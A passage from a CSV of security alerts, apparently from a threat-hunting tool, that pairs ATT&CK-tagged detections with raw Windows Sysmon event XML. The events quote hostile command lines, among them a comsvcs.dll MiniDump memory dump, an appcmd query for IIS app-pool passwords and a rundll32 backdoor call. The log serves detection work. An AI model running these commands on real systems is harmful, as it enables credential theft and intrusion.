<Data Name=""ParentProcessId"">4668</Data>
<Data Name=""ParentImage"">C:\Windows\explorer.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\Explorer.EXE</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
Prohibited Process connecting to internet,1557770610.556085,2019-05-13T22:03:30.556085+04:00,,Threat,Critical,"User (IEWIN7\IEUser) run process C:\Windows\System32\regsvr32.exe and initiated network connection from hostname ( IEWIN7 and IP ( 10.0.2.15 ) to hostname ( ) , IP ( 151.101.128.133 ) and port ( 443 )",3,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>3</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>3</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-13T18:03:21.212898Z"">
</TimeCreated>
<EventRecordID>17289</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""276"" ThreadID=""2056"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-13 18:03:20.485</Data>
<Data Name=""ProcessGuid"">365ABB72-B167-5CD9-0000-001062160C00</Data>
<Data Name=""ProcessId"">2476</Data>
<Data Name=""Image"">C:\Windows\System32\regsvr32.exe</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""Protocol"">tcp</Data>
<Data Name=""Initiated"">true</Data>
<Data Name=""SourceIsIpv6"">false</Data>
<Data Name=""SourceIp"">10.0.2.15</Data>
<Data Name=""SourceHostname"">IEWIN7</Data>
<Data Name=""SourcePort"">49159</Data>
<Data Name=""SourcePortName""></Data>
<Data Name=""DestinationIsIpv6"">false</Data>
<Data Name=""DestinationIp"">151.101.128.133</Data>
<Data Name=""DestinationHostname""></Data>
<Data Name=""DestinationPort"">443</Data>
<Data Name=""DestinationPortName"">https</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1085] Rundll32 Execution detected,1584766825.401237,2020-03-21T09:00:25.401237+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-03-21T05:00:25.392464Z"">
</TimeCreated>
<EventRecordID>243550</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2860"" ThreadID=""3508"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-03-21 05:00:25.388</Data>
<Data Name=""ProcessGuid"">747F3D96-9F69-5E75-0000-001055912000</Data>
<Data Name=""ProcessId"">8160</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
<Data Name=""ParentProcessId"">1652</Data>
<Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[ T1003 ] Credential Dumping ImageLoad,1555606894.448945,2019-04-18T21:01:34.448945+04:00,,Threat,Medium,[ T1003 ] Credential Dumping ImageLoad,7,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>7</EventID>
<Version>3</Version>
<Level>4</Level>
<Task>7</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-04-18T17:01:34.168542Z"">
</TimeCreated>
<EventRecordID>25</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3192"" ThreadID=""3288"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName"">technique_id=T1003,technique_name=Credential Dumping</Data>
<Data Name=""UtcTime"">2019-04-18 17:01:34.138</Data>
<Data Name=""ProcessGuid"">365ABB72-AC28-5CB8-0000-0010F3F70700</Data>
<Data Name=""ProcessId"">1200</Data>
<Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ImageLoaded"">C:\Windows\System32\cryptdll.dll</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Cryptography Manager</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""Hashes"">SHA1=C92A5E9D00AAC177C859B40247787E21D2483610,MD5=1128637CAD49A8E3C8B5FA5D0A061525,SHA256=6B80E50D8296F9E2C978CC6BC002B964ACFD8F4BCF623F4770513792845B5278,IMPHASH=CBB91DBEF75B54D8F20A2EC3E1BC8AC2</Data>
<Data Name=""Signed"">true</Data>
<Data Name=""Signature"">Microsoft Windows</Data>
<Data Name=""SignatureStatus"">Valid</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1003] Processes opening handles and accessing Lsass with potential dlls in memory,1555606894.448945,2019-04-18T21:01:34.448945+04:00,,Threat,High,[T1003] Processes opening handles and accessing Lsass with potential dlls in memory,7,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>7</EventID>
<Version>3</Version>
<Level>4</Level>
<Task>7</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-04-18T17:01:34.168542Z"">
</TimeCreated>
<EventRecordID>25</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3192"" ThreadID=""3288"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName"">technique_id=T1003,technique_name=Credential Dumping</Data>
<Data Name=""UtcTime"">2019-04-18 17:01:34.138</Data>
<Data Name=""ProcessGuid"">365ABB72-AC28-5CB8-0000-0010F3F70700</Data>
<Data Name=""ProcessId"">1200</Data>
<Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ImageLoaded"">C:\Windows\System32\cryptdll.dll</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Cryptography Manager</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""Hashes"">SHA1=C92A5E9D00AAC177C859B40247787E21D2483610,MD5=1128637CAD49A8E3C8B5FA5D0A061525,SHA256=6B80E50D8296F9E2C978CC6BC002B964ACFD8F4BCF623F4770513792845B5278,IMPHASH=CBB91DBEF75B54D8F20A2EC3E1BC8AC2</Data>
<Data Name=""Signed"">true</Data>
<Data Name=""Signature"">Microsoft Windows</Data>
<Data Name=""SignatureStatus"">Valid</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1558920557.2707,2019-05-27T05:29:17.270700+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( &quot;C:\Windows\System32\inetsrv\appcmd.exe&quot; list apppool &quot;ERROR ( message:Configuration error &quot; /text:processmodel.password ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-27T01:29:17.270700Z"">
</TimeCreated>
<EventRecordID>5886</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""324"" ThreadID=""2260"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-27 01:29:17.230</Data>
<Data Name=""ProcessGuid"">365ABB72-3D6D-5CEB-0000-0010D763FF00</Data>
<Data Name=""ProcessId"">3240</Data>
<Data Name=""Image"">C:\Windows\System32\inetsrv\appcmd.exe</Data>
<Data Name=""FileVersion"">7.5.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Application Server Command Line Admin Tool</Data>
<Data Name=""Product"">Internet Information Services</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\inetsrv\appcmd.exe&quot; list apppool &quot;ERROR ( message:Configuration error &quot; /text:processmodel.password</Data>
<Data Name=""CurrentDirectory"">C:\Windows\Temp\</Data>
<Data Name=""User"">IIS APPPOOL\DefaultAppPool</Data>
<Data Name=""LogonGuid"">365ABB72-B26B-5CEA-0000-002023240800</Data>
<Data Name=""LogonId"">0x82423</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45</Data>
<Data Name=""ParentProcessGuid"">365ABB72-3D4A-5CEB-0000-0010FA93FD00</Data>
<Data Name=""ParentProcessId"">2584</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot; -nop -noni -enc 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</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1567169648.396724,2019-08-30T16:54:08.396724+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 C:\windows\system32\comsvcs.dll, MiniDump 4868 C:\Windows\System32\notepad.bin full)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-08-30T12:54:08.354049Z"">
</TimeCreated>
<EventRecordID>32154</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3292"" ThreadID=""928"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-08-30 12:54:08.331</Data>
<Data Name=""ProcessGuid"">747F3D96-1C70-5D69-0000-0010C9661F00</Data>
<Data Name=""ProcessId"">2888</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">rundll32 C:\windows\system32\comsvcs.dll, MiniDump 4868 C:\Windows\System32\notepad.bin full</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-1B6A-5D69-0000-0020E5810E00</Data>
<Data Name=""LogonId"">0xe81e5</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-1C70-5D69-0000-0010D4551F00</Data>
<Data Name=""ParentProcessId"">1144</Data>
<Data Name=""ParentImage"">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1567169648.396724,2019-08-30T16:54:08.396724+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 C:\windows\system32\comsvcs.dll, MiniDump 4868 C:\Windows\System32\notepad.bin full )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-08-30T12:54:08.354049Z"">
</TimeCreated>
<EventRecordID>32154</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3292"" ThreadID=""928"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-08-30 12:54:08.331</Data>
<Data Name=""ProcessGuid"">747F3D96-1C70-5D69-0000-0010C9661F00</Data>
<Data Name=""ProcessId"">2888</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">rundll32 C:\windows\system32\comsvcs.dll, MiniDump 4868 C:\Windows\System32\notepad.bin full</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-1B6A-5D69-0000-0020E5810E00</Data>
<Data Name=""LogonId"">0xe81e5</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-1C70-5D69-0000-0010D4551F00</Data>
<Data Name=""ParentProcessId"">1144</Data>
<Data Name=""ParentImage"">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1085] Rundll32 Execution detected,1567169648.396724,2019-08-30T16:54:08.396724+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 C:\windows\system32\comsvcs.dll, MiniDump 4868 C:\Windows\System32\notepad.bin full )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-08-30T12:54:08.354049Z"">
</TimeCreated>
<EventRecordID>32154</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3292"" ThreadID=""928"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-08-30 12:54:08.331</Data>
<Data Name=""ProcessGuid"">747F3D96-1C70-5D69-0000-0010C9661F00</Data>
<Data Name=""ProcessId"">2888</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">rundll32 C:\windows\system32\comsvcs.dll, MiniDump 4868 C:\Windows\System32\notepad.bin full</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-1B6A-5D69-0000-0020E5810E00</Data>
<Data Name=""LogonId"">0xe81e5</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-1C70-5D69-0000-0010D4551F00</Data>
<Data Name=""ParentProcessId"">1144</Data>
<Data Name=""ParentImage"">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1047] Windows Management Instrumentation - Process,1567169648.396724,2019-08-30T16:54:08.396724+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 C:\windows\system32\comsvcs.dll, MiniDump 4868 C:\Windows\System32\notepad.bin full )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-08-30T12:54:08.354049Z"">
</TimeCreated>
<EventRecordID>32154</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3292"" ThreadID=""928"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-08-30 12:54:08.331</Data>
<Data Name=""ProcessGuid"">747F3D96-1C70-5D69-0000-0010C9661F00</Data>
<Data Name=""ProcessId"">2888</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">rundll32 C:\windows\system32\comsvcs.dll, MiniDump 4868 C:\Windows\System32\notepad.bin full</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-1B6A-5D69-0000-0020E5810E00</Data>
<Data Name=""LogonId"">0xe81e5</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-1C70-5D69-0000-0010D4551F00</Data>
<Data Name=""ParentProcessId"">1144</Data>
<Data Name=""ParentImage"">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1047] Windows Management Instrumentation - Instances of an Active Script Event Consumer - Process,1567169648.396724,2019-08-30T16:54:08.396724+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 C:\windows\system32\comsvcs.dll, MiniDump 4868 C:\Windows\System32\notepad.bin full )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-08-30T12:54:08.354049Z"">
</TimeCreated>
<EventRecordID>32154</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3292"" ThreadID=""928"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-08-30 12:54:08.331</Data>
<Data Name=""ProcessGuid"">747F3D96-1C70-5D69-0000-0010C9661F00</Data>
<Data Name=""ProcessId"">2888</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">rundll32 C:\windows\system32\comsvcs.dll, MiniDump 4868 C:\Windows\System32\notepad.bin full</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-1B6A-5D69-0000-0020E5810E00</Data>
<Data Name=""LogonId"">0xe81e5</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-1C70-5D69-0000-0010D4551F00</Data>
<Data Name=""ParentProcessId"">1144</Data>
<Data Name=""ParentImage"">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1003.001] Credential dump Thread Open to Lsass,1601297256.206545,2020-09-28T16:47:36.206545+04:00,,Threat,Critical,Process ( C:\Windows\System32\rdrleakdiag.exe) attempted to access lsass process ( C:\Windows\System32\lsass.exe),8,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>8</EventID>
<Version>2</Version>
<Level>4</Level>
<Task>8</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-09-28T12:47:36.206545Z"">
</TimeCreated>
<EventRecordID>5227</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2848"" ThreadID=""2328"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>DESKTOP-PIU87N6</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-09-28 12:47:36.204</Data>
<Data Name=""SourceProcessGuid"">BC47D85C-DB68-5F71-0000-0010B237AB01</Data>
<Data Name=""SourceProcessId"">3352</Data>
<Data Name=""SourceImage"">C:\Windows\System32\rdrleakdiag.exe</Data>
<Data Name=""TargetProcessGuid"">BC47D85C-FAA9-5F68-0000-0010D9590000</Data>
<Data Name=""TargetProcessId"">668</Data>
<Data Name=""TargetImage"">C:\Windows\System32\lsass.exe</Data>
<Data Name=""NewThreadId"">3468</Data>
<Data Name=""StartAddress"">0x00007FF8C72C5EC0</Data>
<Data Name=""StartModule"">C:\WINDOWS\SYSTEM32\ntdll.dll</Data>
<Data Name=""StartFunction""></Data>
</EventData>
</Event>",DESKTOP-PIU87N6,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1558920557.190585,2019-05-27T05:29:17.190585+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( &quot;C:\Windows\System32\inetsrv\appcmd.exe&quot; list apppool &quot;ERROR ( message:Configuration error &quot; /text:processmodel.username ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-27T01:29:17.190585Z"">
</TimeCreated>
<EventRecordID>5883</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""324"" ThreadID=""2260"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
